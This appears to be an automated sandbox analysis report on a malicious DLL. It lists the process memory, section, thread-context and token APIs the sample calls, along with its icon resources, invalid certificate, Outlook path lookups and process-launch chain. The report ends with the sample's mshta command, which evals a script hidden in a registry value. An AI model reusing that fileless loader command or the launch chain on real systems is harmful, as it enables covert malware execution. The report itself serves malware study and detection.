Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01024D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_01024D95
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_010467CD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01044FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01044FEA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01031635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_01031635
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103963A GetProcAddress,NtCreateSection,memset, 0_2_0103963A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01023EB7 NtMapViewOfSection, 0_2_01023EB7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D049 NtGetContextThread,RtlNtStatusToDosError, 0_2_0102D049
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0103C0B8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0102C0CF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_0102B8F7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01042CA5 memset,NtQueryInformationProcess, 0_2_01042CA5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_0103CFE8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01027E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01027E6C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01029690 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_01029690
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 NtAllocateVirtualMemory, 0_2_013A08B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0880 NtAllocateVirtualMemory, 0_2_013A0880
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0ABA NtProtectVirtualMemory, 0_2_013A0ABA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_049D6C06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D65B4 NtMapViewOfSection, 3_2_049D65B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049D7562 GetProcAddress,NtCreateSection,memset, 3_2_049D7562
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DB2A9 NtQueryVirtualMemory, 3_2_049DB2A9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0880 NtAllocateVirtualMemory, 3_2_030E0880
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0ABA NtProtectVirtualMemory, 3_2_030E0ABA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 NtAllocateVirtualMemory, 3_2_030E08B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_053DC51B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 3_2_053CD551
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_053C4D95
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E4582 NtQueryInformationProcess, 3_2_053E4582
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E4FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053E4FEA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_053E67CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D963A GetProcAddress,NtCreateSection,memset, 3_2_053D963A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_053D1635
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C3EB7 NtMapViewOfSection, 3_2_053C3EB7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_053DD9F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D09CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053D09CA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_053CB0A5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053E2CA5 memset,NtQueryInformationProcess, 3_2_053E2CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_053DCFE8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053C7E6C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C9690 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_053C9690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD049 NtGetContextThread,RtlNtStatusToDosError, 3_2_053CD049
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_053DC0B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_053CB8F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_053CC0CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0ABA NtProtectVirtualMemory, 4_2_006D0ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D08B7 NtAllocateVirtualMemory, 4_2_006D08B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0880 NtAllocateVirtualMemory, 4_2_006D0880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC4582 NtQueryInformationProcess, 4_2_04AC4582
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_04AA4D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_04ABC51B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_04AB1635
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_04AC67CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_04AAB0A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_04ABD9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC2CA5 memset,NtQueryInformationProcess, 4_2_04AC2CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA9690 NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_04AA9690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_04AA7E6C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_04ABCFE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AC4FEA NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError, 4_2_04AC4FEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_04ABC0B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_04AAB8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_04AAC0CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAD049 NtGetContextThread,RtlNtStatusToDosError, 4_2_04AAD049
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB09CA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_04AB09CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B96C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_02B96C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B965B4 NtMapViewOfSection, 5_2_02B965B4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B97562 GetProcAddress,NtCreateSection,memset, 5_2_02B97562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02B9B2A9 NtQueryVirtualMemory, 5_2_02B9B2A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0ABA NtProtectVirtualMemory, 5_2_02BF0ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF08B7 NtAllocateVirtualMemory, 5_2_02BF08B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0880 NtAllocateVirtualMemory, 5_2_02BF0880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C44582 NtQueryInformationProcess, 5_2_04C44582
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C24D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 5_2_04C24D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 5_2_04C2D551
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 5_2_04C3C51B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C23EB7 NtMapViewOfSection, 5_2_04C23EB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C31635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 5_2_04C31635
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3963A GetProcAddress,NtCreateSection,memset, 5_2_04C3963A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 5_2_04C467CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C44FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_04C44FEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04C2B0A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_04C309CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 5_2_04C3D9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C42CA5 memset,NtQueryInformationProcess, 5_2_04C42CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C29690 NtQuerySystemInformation,RtlNtStatusToDosError, 5_2_04C29690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C27E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_04C27E6C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 5_2_04C3CFE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 5_2_04C2C0CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 5_2_04C2B8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 5_2_04C3C0B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D049 NtGetContextThread,RtlNtStatusToDosError, 5_2_04C2D049
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 42_2_00E2F83C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1617C NtAllocateVirtualMemory, 42_2_00E1617C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E22B88 NtWriteVirtualMemory, 42_2_00E22B88
Source: C:\Windows\System32\control.exe Code function: 42_2_00E334E4 NtQueryInformationProcess, 42_2_00E334E4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E32CC4 NtMapViewOfSection, 42_2_00E32CC4
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1EC38 NtReadVirtualMemory, 42_2_00E1EC38
Source: C:\Windows\System32\control.exe Code function: 42_2_00E1EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose, 42_2_00E1EDFC
Source: C:\Windows\System32\control.exe Code function: 42_2_00E3B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 42_2_00E3B524
Source: C:\Windows\System32\control.exe Code function: 42_2_00E2CF2C NtCreateSection, 42_2_00E2CF2C
Source: C:\Windows\System32\control.exe Code function: 42_2_00E55027 NtProtectVirtualMemory,NtProtectVirtualMemory, 42_2_00E55027
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 43_2_00E1F83C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0617C NtAllocateVirtualMemory, 43_2_00E0617C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E12B88 NtWriteVirtualMemory, 43_2_00E12B88
Source: C:\Windows\System32\control.exe Code function: 43_2_00E234E4 NtQueryInformationProcess, 43_2_00E234E4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E22CC4 NtMapViewOfSection, 43_2_00E22CC4
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0EC38 NtReadVirtualMemory, 43_2_00E0EC38
Source: C:\Windows\System32\control.exe Code function: 43_2_00E0EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose, 43_2_00E0EDFC
Source: C:\Windows\System32\control.exe Code function: 43_2_00E2B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 43_2_00E2B524
Source: C:\Windows\System32\control.exe Code function: 43_2_00E1CF2C NtCreateSection, 43_2_00E1CF2C
Source: C:\Windows\System32\control.exe Code function: 43_2_00E45003 NtProtectVirtualMemory,NtProtectVirtualMemory, 43_2_00E45003
Source: C:\Windows\System32\control.exe Code function: 45_2_0083F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 45_2_0083F83C
Source: C:\Windows\System32\control.exe Code function: 45_2_0082617C NtAllocateVirtualMemory, 45_2_0082617C
Source: C:\Windows\System32\control.exe Code function: 45_2_00832B88 NtWriteVirtualMemory, 45_2_00832B88
Source: C:\Windows\System32\control.exe Code function: 45_2_00842CC4 NtMapViewOfSection, 45_2_00842CC4
Source: C:\Windows\System32\control.exe Code function: 45_2_008434E4 NtQueryInformationProcess, 45_2_008434E4
Source: C:\Windows\System32\control.exe Code function: 45_2_0082EC38 NtReadVirtualMemory, 45_2_0082EC38
Source: C:\Windows\System32\control.exe Code function: 45_2_0082EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose, 45_2_0082EDFC
Source: C:\Windows\System32\control.exe Code function: 45_2_0084B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 45_2_0084B524
Source: C:\Windows\System32\control.exe Code function: 45_2_0083CF2C NtCreateSection, 45_2_0083CF2C
Source: C:\Windows\System32\control.exe Code function: 45_2_00865003 NtProtectVirtualMemory,NtProtectVirtualMemory, 45_2_00865003
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
PE file contains strange resources
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 61b85f75e6a7c.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
PE / OLE file has an invalid certificate
Source: 61b85f75e6a7c.dll Static PE information: invalid certificate
Source: 61b85f75e6a7c.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
